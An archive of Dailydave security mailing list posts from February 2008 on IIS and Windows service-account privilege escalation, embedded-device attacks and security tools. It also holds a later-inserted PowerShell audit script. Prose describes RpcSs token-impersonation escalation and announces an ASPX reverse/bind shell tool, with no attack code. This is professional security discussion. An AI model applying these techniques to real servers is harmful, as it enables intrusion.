From dave at immunityinc.com Fri Feb 1 13:47:39 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Fri, 01 Feb 2008 13:47:39 -0500
Subject: [Dailydave] Network utility.
Message-ID: <47A3694B.4020807@immunityinc.com>

When your utilities rely on your network, your network becomes a utility. That's my take-away from the S4 SCADA conference. One of the talks was on California setting up the ability to turn off everyone's air conditioners when they start having power problems via a radio signal. Then it started talking about building mesh networks between your house and your neighbor's house and eventually going back to the utility company itself. To save money they were going to have signing, but not encryption. Very odd stuff. Everyone loves to know about their neighbor's thermostat, right?

Likewise, since control system networks are described as "quieter than a mouse walking on cotton" there's an opening for anomaly based IDS to succeed as a niche product since it's essentially failed in the wider marketplace. If you do it right, you can hook it up with all sorts of real world events:

 o Face Recognition: I see Bob's face which means activity from Bob's console is normal
 o Moon phases: Large rain + moon phase = flooding gate opening is normal
 o etc

Also, Steve Lipner doesn't read XKCD on a regular basis! I'm still working my way through his book, so here's my question of the day for the Microsoft SDL people.

SD3+C
______________________________
How does "Secure By Default" contradict "Secure In Deployment"?
:>

-dave

From nicolas at immunitysec.com Mon Feb 4 13:28:28 2008
From: nicolas at immunitysec.com (Nicolas Waisman)
Date: Mon, 04 Feb 2008 16:28:28 -0200
Subject: [Dailydave] Immunity Debugger v1.4 Release
Message-ID: <47A7594C.5090802@immunitysec.com>

Immunity is proud to announce: Immunity Debugger v1.4 "veni, vidi, pwn"

We would like to express our appreciation for the enormous amount of contributions, feedback and requests we receive daily from the Immunity Debugger community at http://forum.immunityinc.com. Our TODO list seems infinite but we are getting the most requested features out there for you guys.

New in this release: a proper process detach, a Second Pass Analysis which will soon grow into better argument/local variable recognition, and a new Silent Mode for batch scripts. Last but not least, we have included a collection of new scripts including a lot of contributions from forum regular Bob (scanpe.py, hidedebug.py and bpxep.py) and the contest winning plugin from JMS (instead of a candle dinner with Kostya, he received a brand new job as a Developer on the CANVAS team).

Thanks for using Immunity Debugger! We hope you enjoy this month's release. Check out the Changelog below for more detailed information.
You can upgrade your current Immunity Debugger by going to Help/Update or directly downloading the new installer from http://debugger.immunityinc.com/register.html

Sincerely
Team Immunity
http://www.immunityinc.com

PS: Feedback, Requests, Scripts and Cool Screenshots are always welcome at http://forum.immunityinc.com

1.40 Build 0

New Features:

- Debugger Core:
  o Added Silent Debugging Flag [accessible via Debugging options ALT-O or via immlib]
    http://forum.immunityinc.com/index.php?topic=157.0
  o Added Analysis Second Pass [Decoding Functions]
    http://forum.immunityinc.com/index.php?topic=163.0

- Debugger GUI Core:
  o Now you can add headers + other useful information on every Row displayed at the Disasm Window. The information will be saved as part of the dump struct.
  o Detach option added to File Menu: Go to File -> Dettach [You need to be attached to gray out Dettach]
    http://forum.immunityinc.com/index.php?topic=158.0

- Debugger GUI:
  o Right click on disasm line -> Add Header will add headers to your line

- Immunity Debugger API:
  o Row Headers / Adding Lines to CPU
    - Added imm.addHeader() and imm.getHeader() methods.
    - imm.addLine behaves like addHeader()
    - Added imm.removeHeader()/imm.removeLine() && imm.getHeader()/imm.getLine()
    - Added imm.getTraceArgs()
  o Added imm.goSilent() method.
  o Added imm.undecorateName() method: Undecorate symbol names
    http://forum.immunityinc.com/index.php?topic=159.0
  o Added imm.Dettach() method: Detach current process from debugger
  o Added imm.prepareForNewProcess() method: Prepare Debugger core for a fresh start
  o Updated BoB's UserDB.txt (http://peid.info/BobSoft/Downloads.html)

- PyCommands:
  o Added namefunc.py: a simple sample script that uses imm.addHeader to name functions in a module
  o Added traceargs.py: find user supplied arguments into a given function.
  o Added JMS's Mike & Boo script
  o User Contributed PyCommands:
    - BoB (http://PEiD.info/BobSoft/)
      * scanpe.py (http://forum.immunityinc.com/index.php?topic=137.0)
      * hidedebug.py (http://forum.immunityinc.com/index.php?topic=140.0)
      * bpxep.py (http://forum.immunityinc.com/index.php?topic=138.0)

Bug Fixes:

- Fixed error when adding knowledge and changing python environments later. (__dict__ not accessible in restricted mode error)

From dave at immunityinc.com Tue Feb 5 15:36:31 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Wed, 06 Feb 2008 09:36:31 +1300
Subject: [Dailydave] Can't sleep, clowns will eat me.
Message-ID: <47A8C8CF.3010200@immunityinc.com>

I can't sleep. It's like 5:33 here in Tokyo and I woke up at 2 thinking "Why am I awake?". Luckily there is a present in the inbox!

http://code.google.com/p/pymsrpc/

Yay Cody and Aaron for their hard work on NDR!

-dave

From george_ou at lanarchitect.net Tue Feb 12 04:47:44 2008
From: george_ou at lanarchitect.net (George Ou)
Date: Tue, 12 Feb 2008 01:47:44 -0800
Subject: [Dailydave] Vista SP1 still vulnerable to speech recognition 'analog' hole
Message-ID: <00a001c86d5c$51b5b1e0$f52115a0$@net>

Vista SP1 still vulnerable to speech recognition 'analog' hole

George Ou, CISSP
ZDNet Editor at Large (CNET Networks)
http://blogs.zdnet.com/Ou

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080212/f2423642/attachment.htm

From sqlsec at yahoo.com Wed Feb 13 18:41:43 2008
From: sqlsec at yahoo.com (Cesar)
Date: Wed, 13 Feb 2008 15:41:43 -0800 (PST)
Subject: [Dailydave] MS08-006 under rated?
Message-ID: <933253.45848.qm@web33004.mail.mud.yahoo.com>

From http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx

"A remote code execution vulnerability exists in the way that Internet Information Services handles input to ASP Web pages. An attacker could exploit the vulnerability by passing malicious input to a Web site's ASP page. An attacker who successfully exploited this vulnerability could then perform any actions on the IIS Server with the same rights as the Worker Process Identity (WPI), which by default is configured with Network Service account privileges."

And then in Mitigating factors:

"On supported editions of Windows Server 2003, if IIS is enabled and classic ASP is used, an attacker who successfully exploited this vulnerability could only obtain Network Service account privileges by default. By default, Network Service account privileges have the same user rights as an authenticated user."
The thing is that in Windows XP and Windows 2003 the services security architecture has some weaknesses and any process running as Local Service or Network Service can execute code as Local System (there are other design problems that also allow elevation of privileges but this problem is enough for making the point). MS knows about this since they have fixed some weaknesses in Windows Vista and Windows 2008 (btw: these versions still have some problems).

Because of these problems in Windows XP and Windows 2003, if you can run code from IIS, no matter what account the code is run under (the account only needs to have impersonation rights; any account used for the IIS worker process can impersonate since the account must be a member of the IIS_WPG group, which can impersonate), it always can elevate privileges to Local System. On Windows 2008 if you can run code under Local Service or Network Service then you also can run code as Local System except in some specific (not common) scenarios.

Based on all this I wonder why MS mentions Network Service account privileges as a mitigating factor since Network Service=Local System?

I'm sorry I can't give technical details at this moment, all details will be presented at HITB Dubai. This post is not for promoting my presentation, this is just to let the people know the truth and that they should try to patch ASAP since ASP is still being used in thousands of sites. This is a "pre auth remote system compromise" vulnerability.

BTW: the weaknesses that I'm talking about aren't simple issues like impersonating when a user authenticates to IIS, which btw hasn't been mentioned in the advisory either, ie: an administrator authenticates to IIS so the worker process can impersonate it and elevate privileges. The weaknesses I'm talking about can be exploited all the time without special settings nor user interaction.

Thanks.
PD: And yes if you provide hosting on IIS you can have problems, if users can upload .asp or .aspx files to your IIS then it's not your server anymore, but I'm not saying anything new:

"Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more"
http://www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true

Cesar.

From nruff at security-labs.org Thu Feb 14 07:39:10 2008
From: nruff at security-labs.org (Nicolas RUFF)
Date: Thu, 14 Feb 2008 13:39:10 +0100
Subject: [Dailydave] MS08-006 under rated?
In-Reply-To: <933253.45848.qm@web33004.mail.mud.yahoo.com>
References: <933253.45848.qm@web33004.mail.mud.yahoo.com>
Message-ID: <47B4366E.70802@security-labs.org>

> I'm sorry I can't give technical details at this moment, all details
> will be presented at HITB Dubai.

I remember reading:
http://www.nynaeve.net/?p=149

Which gives pretty scary details on how efficient service accounts isolation is.

Regards,
- Nicolas RUFF

From gsw at gentlesecurity.com Thu Feb 14 08:26:32 2008
From: gsw at gentlesecurity.com (Andrey Kolishchak)
Date: Thu, 14 Feb 2008 14:26:32 +0100
Subject: [Dailydave] MS08-006 under rated?
In-Reply-To: <933253.45848.qm@web33004.mail.mud.yahoo.com>
References: <933253.45848.qm@web33004.mail.mud.yahoo.com>
Message-ID: <1174859294.20080214142632@gentlesecurity.com>

Dear Cesar,

well, we have an advisory on this
http://www.gentlesecurity.com/adv04302006.html

And also have a demo that elevates IIS's NetworkService up to LocalSystem.

The exploit targets RpcSs which also runs on behalf of NetworkService and _always_ (no special actions required) contains token handles for LocalSystem. The tokens are the result of impersonation of privileged clients heavily using RPCs.
The attack just enumerates all handles in the RpcSs process, finds those with LocalSystem privileges and impersonates a thread with that token.

The problem is that there are many other services that run on behalf of the NetworkService or LocalService accounts. And some of these services have to impersonate privileged clients, such as RpcSs. So you just break into one of the services and are able to compromise all the others.

Microsoft's decision to run RpcSs as NetworkService has, in fact, weakened the configuration. RpcSs running on behalf of LocalSystem would be more secure as other NetworkService processes would not be able to attack it.

The issue with services is partly addressed in Windows Vista where process objects might be owned by a unique service SID, symbolic: NT Service\ServiceName. However, that is not enabled for all services by default. Not even all services coming with Vista support unique service SIDs.

I guess you are mentioning the same problem and would be interested to hear more about it if that is something new.

But NetworkService is particularly dangerous, even without this problem. NetworkService has permissions to issue SIO_RCVALL on sockets and sniff the machine's network traffic (note, no additional driver is required).

Andrey.

> From http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx
>
> "A remote code execution vulnerability exists in the way that Internet Information Services handles input to ASP Web pages. An attacker could exploit the vulnerability by passing malicious input to a Web site's ASP page. An attacker who successfully exploited this vulnerability could then perform any actions on the IIS Server with the same rights as the Worker Process Identity (WPI), which by default is configured with Network Service account privileges."
> And then in Mitigating factors:
>
> "On supported editions of Windows Server 2003, if IIS is enabled and classic ASP is used, an attacker who successfully exploited this vulnerability could only obtain Network Service account privileges by default. By default, Network Service account privileges have the same user rights as an authenticated user."
>
> The thing is that in Windows XP and Windows 2003 the services security architecture has some weaknesses and any process running as Local Service or Network Service can execute code as Local System (there are other design problems that also allow elevation of privileges but this problem is enough for making the point), MS knows about this since they have fixed some weaknesses in Windows Vista and Windows 2008 (btw: these versions still has some problems)
>
> Because of these problems in Windows XP and Windows 2003 if you can run code from IIS, no matter what account the code is run under (the account only needs to have impersonation rights, any account used for IIS worker process can impersonate since the account must be member of the IIS_WPG group which can impersonate), it always can elevate privileges to Local System. On Windows 2008 if you can run code under Local Service or Network Service then you also can run code as Local System except in some specific (not common) scenarios. Based on all this I wonder why MS mentions Network Service account privileges as a mitigating factor since Network Service=Local System?
>
> I'm sorry I can't give technical details at this moment, all details will be presented at HITB Dubai.
>
> This post is not for promoting my presentation, this is just to let the people know the truth and that they should try to patch ASAP since ASP is still being used in thousands of sites, This is a "pre auth remote system compromise" vulnerability.
> BTW: the weaknesses that I'm talking about aren't simple issues like impersonating when a user authenticates to IIS, which btw hasn't been mentioned in advisory too, ie: an administrator authenticates to IIS so the worker process can impersonate it and elevate privileges.
>
> The weaknesses I'm talking about can be exploited all the time without special settings nor user interaction.
>
> Thanks.
>
> PD: And yes if you provide hosting on IIS you can have problems, if users can upload .asp or .aspx files to your IIS then is not your server anymore but I'm not saying nothing new :
> "Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more"
> http://www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true
>
> Cesar.
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave

From sqlsec at yahoo.com Thu Feb 14 08:42:44 2008
From: sqlsec at yahoo.com (Cesar)
Date: Thu, 14 Feb 2008 05:42:44 -0800 (PST)
Subject: [Dailydave] MS08-006 under rated?
Message-ID: <172399.52286.qm@web33006.mail.mud.yahoo.com>

Nice articles, they mention some problems; luckily none of them are the ones I found ;) so you can imagine how many problems there are. I didn't know about the DACL on Local Service or Network Service service processes allowing WRITE DAC to the account the processes run as; if that works then there you have a way to compromise another process to get a high privileged token and elevate privileges.

Cesar.

----- Original Message ----
From: Nicolas RUFF
To: dailydave at lists.immunityinc.com
Cc: Cesar
Sent: Thursday, February 14, 2008 9:39:10 AM
Subject: Re: [Dailydave] MS08-006 under rated?
> I'm sorry I can't give technical details at this moment, all details
> will be presented at HITB Dubai.

I remember reading:
http://www.nynaeve.net/?p=149

Which gives pretty scary details on how efficient service accounts isolation is.

Regards,
- Nicolas RUFF

From dave at immunityinc.com Thu Feb 14 09:25:31 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 14 Feb 2008 09:25:31 -0500
Subject: [Dailydave] Printers
Message-ID: <47B44F5B.6010603@immunityinc.com>

http://www.eweek.com/c/a/Printers/Multifunction-Printers-The-Forgotten-Security-Risk/1/

I found this article quite interesting since Bas just finished a penetration test where he managed to break in through a large printer that was exposed to the Internet. There are real business reasons for having your printers exposed and the risks are somewhat vague, especially to most network security staff. I like seeing some of the theoretical stuff actually happen though. :>

Sinan Eren is giving a neat talk in a few days at BlackHat Federal - IO Immunity Style. It starts off with a case study of what happens when someone real goes up against a hard target and isn't doing a penetration test. After that you get to see a demo of PINK, which is an essentially undetectable-on-the-wire remote beaconing trojan he wrote. Then at the end you get to ask questions of one of the finest information security minds in the industry.

I'll be at the first day of BH Federal as well, and helping with the defend the flag. So hopefully I'll see a lot of the people on this list there!
-d

From sqlsec at yahoo.com Thu Feb 14 09:34:36 2008
From: sqlsec at yahoo.com (Cesar)
Date: Thu, 14 Feb 2008 06:34:36 -0800 (PST)
Subject: [Dailydave] MS08-006 under rated?
Message-ID: <851421.36886.qm@web33008.mail.mud.yahoo.com>

Hi Andrey.

> well, we have an advisory on this http://www.gentlesecurity.com/adv04302006.html
> And also have demo that elevates IIS's NetworkService up to LocalSystem.

Yes I have seen your advisory a long time ago, you didn't mention any technical details nor provide any code (which is OK) so I don't know if we are talking about the same problems.

> The Microsoft's decision to run RpcSs as NetworkService is, in fact,
> weakened the configuration. RpcSs run on behalf of LocalSystem would
> be more secure as other NetworkService processes would not be able to
> attack it.

Running RpcSs as LocalSystem won't help much, still other attacks are possible. The RpcSs process is not the only one that impersonates LocalSystem.

> The issue with services is partly addressed in Windows Vista where
> process objects might be owned by unique service SID, symbolic: NT
> Service\ServiceName. However, that is not enabled for all services by
> default. Not even all services coming with Vista support unique
> service SIDs.
>
> I guess, you mentioning the same problem and would be interested to
> hear more about if that is something new.

Again, you are not mentioning technical details nor providing code (which is OK) so I don't know if we are talking about the same problems.

> But NetworkService is particularly dangerous, even without this
> problem. NetworkService has permissions to issue SIO_RCVALL on sockets
> and sniff machine's network traffic (note, no additional driver is
> required).
This is cool, I didn't know about this; again we can see how many problems related with NetworkService and LocalService there are.

PS: I know I'm not providing technical details nor code, I can't because I will present this stuff at a conference. Anyways this thread is bringing to light interesting stuff.

Cesar.
From dailydave at digitaloffense.net Thu Feb 14 09:39:13 2008
From: dailydave at digitaloffense.net (H D Moore)
Date: Thu, 14 Feb 2008 08:39:13 -0600
Subject: [Dailydave] MS08-006 under rated?
In-Reply-To: <933253.45848.qm@web33004.mail.mud.yahoo.com>
References: <933253.45848.qm@web33004.mail.mud.yahoo.com>
Message-ID: <200802140839.13451.dailydave@digitaloffense.net>

You can read my first round of analysis here:
https://strikecenter.bpointsys.com/

The two questions I still have:

* Is this exploitable out of the box with iishelp/common/500-100.asp
* Is this exploitable through Response.Redirect()

Cheers,
-HD

On Wednesday 13 February 2008, Cesar wrote:
> From http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx
> "A remote code execution vulnerability exists in the way that Internet
> Information Services handles input to ASP Web pages. An attacker could
> exploit the vulnerability by passing malicious input to a Web site's
> ASP page. An attacker who successfully exploited this vulnerability
> could then perform any actions on the IIS Server with the same rights
> as the Worker Process Identity (WPI), which by default is configured
> with Network Service account privileges."

From gsw at gentlesecurity.com Thu Feb 14 10:49:54 2008
From: gsw at gentlesecurity.com (Andrey Kolishchak)
Date: Thu, 14 Feb 2008 16:49:54 +0100
Subject: [Dailydave] MS08-006 under rated?
In-Reply-To: <851421.36886.qm@web33008.mail.mud.yahoo.com>
References: <851421.36886.qm@web33008.mail.mud.yahoo.com>
Message-ID: <84514741.20080214164954@gentlesecurity.com>

> Yes I have seen your advisory long time ago, you didn't mention any
> technical details nor provide any code (which is OK ) so I don't

The advisory mentions that a demo is provided, and it has been available on request on our web site since the moment of the advisory (almost two years by now). Given that, I would say we didn't provide any code.
Now I have just explained how the exploit works; is it still insufficient to judge for similarities? I'm just curious.

Thanks,
Andrey
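A defender-side check that follows from the thread above, added here as an example (it is not code from the thread, from Gentle Security or from Microsoft). It lists every service configured to run as NetworkService or LocalService, groups them by host process, and queries each service's SID type with sc.exe qsidtype, which only exists on Vista / Server 2008 and later; on XP / 2003 there is no per-service SID at all, which is exactly the situation Cesar describes. It also shows which account the IIS worker processes (w3wp.exe) run under, so you can see which services share that account with a compromised worker. The output is a map of what such a worker could reach by opening sibling processes in the same account, not an exploit. It assumes an elevated PowerShell 3.0 or later session on Vista / Server 2008 or newer.

```powershell
# Added example: audit which services share the IIS worker process account.
# Assumes Windows Vista / Server 2008 or later (sc.exe qsidtype) and an
# elevated PowerShell 3.0+ session. Not code from the thread.

$accounts = 'NetworkService|LocalService'

# Every service configured to run as NetworkService or LocalService.
$shared = Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -match $accounts }

$report = foreach ($svc in $shared) {
    # sc.exe prints a line like "SERVICE_SID_TYPE:  UNRESTRICTED" (or RESTRICTED / NONE)
    $line = & sc.exe qsidtype $svc.Name 2>$null |
        Where-Object { $_ -match 'SERVICE_SID_TYPE' }
    $sidType = if ($line) { ($line -split ':\s*')[1].Trim() } else { 'UNKNOWN' }

    [pscustomobject]@{
        Service   = $svc.Name
        Account   = $svc.StartName
        State     = $svc.State
        ProcessId = $svc.ProcessId
        SidType   = $sidType
    }
}

# Services with the same ProcessId share one svchost address space: code
# running in that process is already inside all of them.
"Services running as NetworkService/LocalService, grouped by host process:"
$report | Sort-Object Account, ProcessId |
    Format-Table Account, ProcessId, Service, State, SidType -AutoSize

# Per-service SIDs are the Vista mitigation Andrey mentions. A running
# service with SidType NONE is protected only by the shared account SID,
# so any other process in that account can open it (on 2003 every service
# is in this position, since the SID type does not exist there).
"`nRunning services in these accounts with no per-service SID:"
$report | Where-Object { $_.State -eq 'Running' -and $_.SidType -eq 'NONE' } |
    Format-Table Service, Account, ProcessId -AutoSize

# RpcSs is the service the Gentle Security demo targets.
"`nRpcSs:"
$report | Where-Object { $_.Service -eq 'RpcSs' } | Format-List

# Which account do the IIS worker processes actually run as?
"`nIIS worker processes:"
Get-CimInstance Win32_Process -Filter "Name = 'w3wp.exe'" | ForEach-Object {
    $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
    [pscustomobject]@{
        ProcessId   = $_.ProcessId
        Owner       = "$($owner.Domain)\$($owner.User)"
        CommandLine = $_.CommandLine
    }
} | Format-Table -AutoSize
```

Read the result the way the thread does: a per-service SID on RpcSs (UNRESTRICTED) is what stops a sibling NetworkService process from opening it on Vista and later, but it does nothing for services that share RpcSs's svchost, and nothing at all on Server 2003, where the SidType column cannot exist. If w3wp.exe runs as NT AUTHORITY\NETWORK SERVICE, every service in the first table with SidType NONE is on the path Cesar and Andrey describe; moving the application pool to a dedicated, non-impersonating account removes that overlap.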
From unknown.pentester at gmail.com Thu Feb 14 11:16:47 2008
From: unknown.pentester at gmail.com (Adrian P)
Date: Thu, 14 Feb 2008 16:16:47 +0000
Subject: [Dailydave] Printers
In-Reply-To: <47B44F5B.6010603@immunityinc.com>
References: <47B44F5B.6010603@immunityinc.com>
Message-ID:

Well, to me, embedded devices are the overlooked backdoor to corporate networks. There is not enough attention being paid to "miscellaneous" embedded devices such as IP phones, cameras, printers, etc... Also let's not forget that what makes a "consumer grade" router is becoming very blurry these days as home-type routers are being used in SOHOs and corporate networks (ie: Linksys routers).

What's exciting to me is not only the fact that many of these devices can be broken into so easily, but also what can be done _after_ compromising them: stepping stone attacks. In other words: you might have your web/app server properly segmented, but what about all those random "not a big deal" embedded devices exposed to the Internet but located in the LAN of the corporate network?

Most people say: "well, you can break into my printer, what a big deal". Well, maybe being able to stop print jobs is not a big deal, but perhaps you can enable port forwarding via the web console or UPnP in order to probe internal systems - then things do get interesting. The possibilities are endless!

After researching embedded devices for a while I've realized that the web interfaces and insecure built-in protocols such as UPnP (authentication-less) are the low hanging fruit for attacking such systems. I mean, you find web security bugs that remind you of things people would find in the early 90s.

Anyway, for those interested in this topic I will be giving my "Cracking into Embedded Devices and Beyond!"
presentation which will demo Hollywood-style camera hacks (replacing video stream with infinite loop), and wardriving over the Internet via owned embedded devices:

http://conference.hackinthebox.org/hitbsecconf2008dubai/?page_id=186

Regards,
AP.

On Thu, Feb 14, 2008 at 2:25 PM, Dave Aitel wrote:
> http://www.eweek.com/c/a/Printers/Multifunction-Printers-The-Forgotten-Security-Risk/1/
>
> I found this article quite interesting since Bas just finished a
> penetration test where he managed to break in through a large printer
> that was exposed to the Internet. There are real business reasons for
> having your printers exposed and the risks are somewhat vague,
> especially to most network security staff. I like seeing some of the
> theoretical stuff actually happen though. :>
>
> Sinan Eren is giving a neat talk in a few days at BlackHat Federal -
> IO Immunity Style. It starts off with a case study of what happens
> when someone real goes up against a hard target and isn't doing a
> penetration test. After that you get to see a demo of PINK, which is
> an essentially undetectable-on-the-wire remote beaconing trojan he
> wrote. Then at the end you get to ask questions of one of the finest
> information security minds in the industry.
>
> I'll be at the first day of BH Federal as well, and helping with the
> defend the flag. So hopefully I'll see a lot of the people on this
> list there!
>
> -d
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

--
pagvac
gnucitizen.org

From brett.moore at insomniasec.com Thu Feb 14 14:04:39 2008
From: brett.moore at insomniasec.com (Brett Moore)
Date: Fri, 15 Feb 2008 08:04:39 +1300
Subject: [Dailydave] Insomnia: Tool Release - InsomniaShell.aspx
Message-ID: <000001c86f3c$744ea090$5cebe1b0$@moore@insomniasec.com>

___________________________________________________________________

Insomnia Security :: InsomniaShell.aspx
___________________________________________________________________

Name: InsomniaShell.aspx
Released: 12 Feb 2008
Author: Brett Moore, Insomnia Security
Original Link: http://www.insomniasec.com/releases/tools
___________________________________________________________________

InsomniaShell is a tool for use during penetration tests, when you have the ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either a reverse shell or a bind shell. It has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation.

If the provider page is running on a server with a local SQL Server instance, the shell includes functionality for a named pipe impersonation attack. This requires knowledge of the sa password, and results in the theft of the token that the SQL server is executing under.
___________________________________________________________________

From jdangler at terremark.com Thu Feb 14 16:49:47 2008
From: jdangler at terremark.com (John Dangler)
Date: Thu, 14 Feb 2008 16:49:47 -0500
Subject: [Dailydave] Embedded devices
Message-ID: <5BA9127B88DFD347AE9A8F1C05A6E08BFB68F9@exchange04.terremark.org>

While somewhat new to all of this, it seems to remind me of a book I read long ago - The Cuckoo's Egg. And a more recent one - The Art of Intrusion. Basically, nothing should be overlooked or left to chance.

Jack - BB

From dan at geer.org Thu Feb 14 19:57:04 2008
From: dan at geer.org (dan at geer.org)
Date: Thu, 14 Feb 2008 19:57:04 -0500
Subject: [Dailydave] Printers
In-Reply-To: Your message of "Thu, 14 Feb 2008 16:16:47 GMT."
Message-ID: <20080215005704.F1B4233DD1@absinthe.tinho.net>

"Adrian P" writes:
-+----------------
 | Well, to me, embedded devices are the overlooked backdoor to
 | corporate networks. There is not enough attention being paid
 | to "miscellaneous" embedded devices such as IP phones, cameras,
 | printers, etc ...

As far as I can tell, the general purpose computer is dead; it just doesn't know it yet. Nearly all the NYC banks of note are returning to time-share (with modern accouterment) and so-called service-oriented architecture (SOA) or software as a service (SAAS) are little more than time-share with the Internet in lieu of the mainframe backplane. Example, the newest trading floor of which I am aware has no PCs at all, only displays driven by VMs (typically Windows) running on big iron (typically IBM Linux) in distant, redundant, obscure data centers. The reason is their realization that securing the desktop is a fool's errand and security is, in any case, a subset of reliability.
If we are to talk about the future, then we talk about embedded systems as they are already two orders of magnitude more numerous than keyboards and displays, hence the future threat space, which we must lead in the same way one leads the deer when hunting, is a threat space where a computer is not identifiable as such but is instead inside some nondescript appliance.

So, starting what may be an embedded system thread, let me ask whether an embedded system should or should not have a remote management interface? If it does not, then a late discovered flaw cannot be fixed without visiting all the embedded systems, which is likely to be infeasible both because some will be where you cannot go and there will be too many of them anyway. If it does have a remote management interface, the opponent of skill focuses on that and, once a break is achieved, will use those self-same management functions to ensure that not only does he retain control over the long interval but, as well, you will be unlikely to know that he is there.

This leads me to a proposal: Embedded systems, if having no remote management interface and thus out of reach, are a life form and, as Agent Smith said, the purpose of life is to end, i.e., an embedded system without a remote management interface must be so designed as to be certain to die no later than some fixed time. Conversely, an embedded system with a remote management interface must be sufficiently self-protecting that it is capable of refusing a command.

The singularity approaches,

--dan

From dave at immunityinc.com Sat Feb 16 09:03:50 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 17 Feb 2008 03:03:50 +1300
Subject: [Dailydave] NematodeMS
Message-ID: <47B6ED46.8090306@immunityinc.com>

http://technology.newscientist.com/article/dn13318-friendly-worms-could-spread-software-fixes.html

I have to admit that it's cool when Microsoft builds Nematodes.
:>

-dave

From dave at immunityinc.com Sun Feb 17 11:20:19 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 17 Feb 2008 11:20:19 -0500
Subject: [Dailydave] You are in a maze of twisty little passages, all alike
Message-ID: <47B85EC3.2050101@immunityinc.com>

Geek culture has its own literature. Adventure, the text game, is one of these canons, as is Zork and all the Infocom games [1]. For a lot of us, Adventure was the first game we ever played. It turns out that someone went and did a big documentary on them, and then gave a talk about it at Shmoocon. He found out that the Adventure game was written by a caver, and based on a real cave in Kentucky. And then he took a video camera and shot some footage down in the original cave, where the birdcage room is, near the twisty little passages, all alike.

During his talk, he shows you some of the stills of the cave, and as he goes through them, if you've played enough Adventure, your brain can reconstruct the geography. From just the experience of playing a text game, you feel like you know your way around the cave as he goes through the photos. It's uncanny. You've never been there, or even seen drawings, but your brain tells you that you recognize the places. Yes, here's the hall of the mountain king, here's the birdcage room, here's the stream you go down to find the cave where the lamp sits. Anyways, he has his site up at takelamp.com. It's worth a look-see. Sometimes the talks you go to in a conference that are not technical are the ones you remember.
-dave

[1] http://www.xs4all.nl/~pot/infocom/

From dave at immunityinc.com Sun Feb 17 11:30:51 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 17 Feb 2008 11:30:51 -0500
Subject: [Dailydave] I love the smell of Cisco remotes in the morning
Message-ID: <47B8613B.4070907@immunityinc.com>

So there was a talk at Shmoocon about modifying SPIKE 2.9 to be a decent fuzzer for Layer 2. During the talk they demonstrated a remote stack overflow in some Cisco box via some random L2 protocol I'd never heard of before. That was very cool. :>

This has an earlier version of their talk. At some point they're going to put their modified SPIKE online, so everyone can find cool L2 bugs, although for their newer work I believe they've switched to Sulley.

http://www.day-con.org/2007/l2_fuzzing_v099r_ger.pdf

-dave

From dave at immunityinc.com Sun Feb 17 12:13:35 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Sun, 17 Feb 2008 12:13:35 -0500
Subject: [Dailydave] A bag of hammers
Message-ID: <47B86B3F.9060101@immunityinc.com>

Just as a warning, if you're a mathematician, you're going to cough up your skull at this post. I don't know the first thing about real math. Don't say I didn't warn you.
_________________

So I often think of some mathematical techniques as hammers that people use to smack at every nail, willy-nilly.
For example, in my sample bag of hammers:

 o Expert Systems/Heuristics/Signatures [5]
 o Neural Networks [3]
 o Bayesian Classifiers/Probabilistic learning algos [4]
 o Markov Chains
 o FFT/DCT/Wavelets

There are lots of other examples, but some hammers are more generic and get used to smack at every nail, and the ones I listed are the ones you see every day.

I've been thinking a lot about remote OS detection, and TCP flags, and that sort of thing. Ofir Arkin's presentation [1] has a good point in it, I think. XProbe2 uses "fuzzy logic" which I assume is some sort of statistical heuristics based on a decision tree (Ofir's on this list, so we'll all get to find out the details I'm sure :>). NMap uses a signature lookup. I think both of those techniques could be improved on.

Essentially the problem, as I see it, is much harder than it originally looks. At first you think:

  Attacker ------->Firewall----> Target

And you then proceed to compensate for packet loss, blocked packets, and whatnot. But in reality you're passing through a lot of different hardware.

  Attacker --->Switch--->Firewall--->Router--->Firewall--->Target

And each of these can apply transformations to your packet, or choose to drop it, and each packet can go through different hosts each time, and come back over a different path, and your target might be different for each packet (say, if it is getting load balanced). And of course, each port on your target might go to a different machine. Closed ports may be the firewall, port 80 might be the Apache server running on Linux, and port 25 might be forwarded to a mail gateway.

It's for this reason that CANVAS does only Application-Layer OS Fingerprinting now. We try to fingerprint the OS using the same protocol you're trying to attack. That way we don't care that port 25 goes to a different host entirely.
To do OS fingerprinting via raw packets right you essentially have to discover state on a lossy network on each of maybe 20 network devices in between yourself and your target, which change in and out randomly, and even your target can be one host or multiple hosts. What you really want is something more like firewalk [2] that does OS detection (or at least "feature" detection) on all the potential devices in between you and your target before it does the OS detection against your target(s). Devices may or may not have an IP address or modify TTL, which is part of the fun.

w00t 07 had some interesting work [6] that optimized the ruleset for nmap to note that you only need one to three packets to do OS detection - which is a significant improvement. Of course, the benefit of having redundant information is that you can account more often for network interference during your scan, theoretically.

Anyways, my thought is this. Can you represent the network conditions in between you and your target(s) with a Markov Chain? Would this provide better results than signature/Neural Network/Classifier approaches? Hopefully someday soon we'll get to find out.
